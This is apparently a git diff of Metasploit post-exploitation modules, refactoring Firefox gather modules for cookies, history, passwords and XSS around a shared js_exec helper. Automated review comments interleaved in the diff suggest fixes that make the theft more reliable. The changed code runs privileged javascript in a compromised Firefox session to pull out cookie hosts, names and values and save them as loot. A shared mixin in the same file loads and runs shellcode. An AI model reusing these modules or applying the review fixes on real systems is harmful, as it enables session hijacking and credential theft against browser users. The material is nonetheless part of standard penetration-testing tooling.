diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
index b03172c234..b36e245414 100644
--- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
+++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
@@ -9,7 +9,17 @@ module Msf
 module Exploit::Remote::FirefoxPrivilegeEscalation
-
+
+  # Sends the +js+ code to the remote session, which executes it in Firefox's
+  # privileged javascript context
+  # @return [String] the results that were sent back. This can be achieved through
+  # calling the "send" function, or by just returning the value in +js+
+  def js_exec(js)
+    print_status "Running the privileged javascript..."
+    session.shell_write("[JAVASCRIPT]#{js}[/JAVASCRIPT]")
+    session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+  end
+
   # Puts the shellcode into memory, adds X flag, and calls it
   # The js function throws on error
   # @return [String] javascript code containing the execShellcode() javascript fn
diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
index 40c5461117..1ebd1204d8 100644
--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote
   def html
     ""
   end
-end
+end
\ No newline at end of file
diff --git a/modules/post/firefox/gather/cookies.rb b/modules/post/firefox/gather/cookies.rb
index ce6c5a69e7..18cefbef6f 100644
--- a/modules/post/firefox/gather/cookies.rb
+++ b/modules/post/firefox/gather/cookies.rb
@@ -5,11 +5,9 @@
 require 'json'
 require 'msf/core'
-require 'msf/core/payload/firefox'
 class Metasploit3 < Msf::Post
-  include Msf::Payload::Firefox
   include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
   def initialize(info={})
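Review bot: `js_exec` reads `datastore['TIMEOUT']`, but nothing in this mixin registers that option, so a module that includes the mixin without declaring TIMEOUT hands nil to shell_read_until_token; the YARD header should state that requirement, and a fallback such as `session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'] || 90)` would make the helper safe to reuse. The header also has no `@param`; I would add `# @param js [String] javascript to run in the privileged context; it must not contain the literal "[/JAVASCRIPT]" terminator, which would cut the frame short`. What shell_read_until_token returns when the token never arrives is not visible here, but every caller in this commit guards with `results.present?`, so the `@return` should say the value may be nil or empty on timeout rather than promise a String.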
@@ -29,12 +27,14 @@ class Metasploit3 < Msf::Post
   end
   def run
-    print_status "Running the privileged javascript..."
-    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
-    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+    results = js_exec(js_payload)
     if results.present?
       begin
         cookies = JSON.parse(results)
+        cookies.each do |entry|
+          entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
+        end
+
         file = store_loot("firefox.cookies.json", "text/json", rhost, results)
         print_good("Saved #{cookies.length} cookies to #{file}")
       rescue JSON::ParserError => e
@@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post
     %Q|
       (function(send){
         try {
+          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
           var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"]
             .getService(Components.interfaces.nsICookieManager);
           var cookies = [];
@@ -54,7 +55,7 @@ class Metasploit3 < Msf::Post
           while (iter.hasMoreElements()){
             var cookie = iter.getNext();
             if (cookie instanceof Components.interfaces.nsICookie){
-              cookies.push({host:cookie.host, name:cookie.name, value:cookie.value})
+              cookies.push({host:b64(cookie.host), name:b64(cookie.name), value:b64(cookie.value)})
             }
           }
           send(JSON.stringify(cookies));
diff --git a/modules/post/firefox/gather/history.rb b/modules/post/firefox/gather/history.rb
index 75808963c0..1db4ed7993 100644
--- a/modules/post/firefox/gather/history.rb
+++ b/modules/post/firefox/gather/history.rb
@@ -5,11 +5,9 @@
 require 'json'
 require 'msf/core'
-require 'msf/core/payload/firefox'
 class Metasploit3 < Msf::Post
-  include Msf::Payload::Firefox
   include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
   def initialize(info={})
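Review bot: The decode loop added to `run` rewrites the entries in `cookies`, but the unchanged `store_loot(...)` line below it still writes `results`, the raw JSON whose host/name/value fields are now base64 because of the js_payload change in this same commit, so the loot file ends up encoded and the decoded hashes are only used for `cookies.length`. Store the decoded data instead: `file = store_loot("firefox.cookies.json", "text/json", rhost, JSON.pretty_generate(cookies))`. The loop also base64-decodes every key unconditionally; that holds while the javascript side emits only host/name/value strings, but a non-string value would raise something other than JSON::ParserError inside the `begin` and escape the rescue. On the javascript side `btoa` throws for characters above U+00FF, and since it runs inside the single try block one such cookie value would abort the whole dump rather than just that entry.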
@@ -30,9 +28,7 @@ class Metasploit3 < Msf::Post
   end
   def run
-    print_status "Running the privileged javascript..."
-    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
-    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+    results = js_exec(js_payload)
     if results.present?
       begin
         history = JSON.parse(results)
diff --git a/modules/post/firefox/gather/passwords.rb b/modules/post/firefox/gather/passwords.rb
index d3db014177..24130d0f4e 100644
--- a/modules/post/firefox/gather/passwords.rb
+++ b/modules/post/firefox/gather/passwords.rb
@@ -29,9 +29,7 @@ class Metasploit3 < Msf::Post
   end
   def run
-    print_status "Running the privileged javascript..."
-    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
-    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+    results = js_exec(js_payload)
     if results.present?
       begin
         passwords = JSON.parse(results)
diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb
index 4d2e960e69..63049a2a7b 100644
--- a/modules/post/firefox/gather/xss.rb
+++ b/modules/post/firefox/gather/xss.rb
@@ -10,6 +10,7 @@ require 'msf/core/payload/firefox'
 class Metasploit3 < Msf::Post
   include Msf::Payload::Firefox
+  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
   def initialize(info={})
     super(update_info(info,
@@ -36,9 +37,7 @@ class Metasploit3 < Msf::Post
   end
   def run
-    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
-    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
-
+    results = js_exec(js_payload)
     if results.present?
       print_good results
     else
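Review bot: xss.rb now mixes in both `Msf::Payload::Firefox` and `Msf::Exploit::Remote::FirefoxPrivilegeEscalation`, while cookies.rb and history.rb in this same commit drop the former together with its `require`; if this module uses nothing from Msf::Payload::Firefox, the include and the `require 'msf/core/payload/firefox'` should go here too, and if it does, a one-line comment on the include naming the helper it provides would stop a later cleanup from removing it. With two mixins that may define overlapping helpers, the one included last (FirefoxPrivilegeEscalation) wins method lookup, which is worth confirming for `js_payload` since it is not defined in any visible hunk. The class body this hunk sits in continues outside the hunk; the run hunk further down keeps the same `results.present?` guard as the other modules and, via js_exec, gains the "Running the privileged javascript..." status line that xss.rb previously did not print.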